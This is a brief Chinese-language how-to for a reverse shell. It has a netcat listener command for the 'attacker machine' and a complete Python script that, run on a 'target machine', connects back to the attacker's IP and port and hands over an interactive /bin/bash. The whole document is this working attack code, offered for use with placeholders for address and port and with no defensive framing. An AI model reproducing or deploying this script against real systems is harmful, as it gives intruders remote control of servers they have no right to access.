攻击机监听端口
在监听模式下(-l),以详细模式运行(-v),并监听在端口号为111(-p 111)的端口上,等待连接:
nc -lvvp 111
//nc是netcat命令的缩写
靶机发起请求
靶机通过执行Python脚本实现对攻击机的请求
脚本实现的功能:攻击机接管靶机
创建Python脚本:
vim test.py
内容如下:
import socket
import subprocess
import os
# 创建一个 TCP 套接字
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接指定的 IP 和端口
s.connect(("IP", 端口))
# 将套接字的文件描述符复制到标准输入、输出和错误
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# 调用 /bin/bash,启动一个交互式的 Bash shell
p = subprocess.call(["/bin/bash", "-i"])
运行Python脚本:
python test.py
此时靶机将向攻击机发起请求,攻击机即可接管该靶机服务器。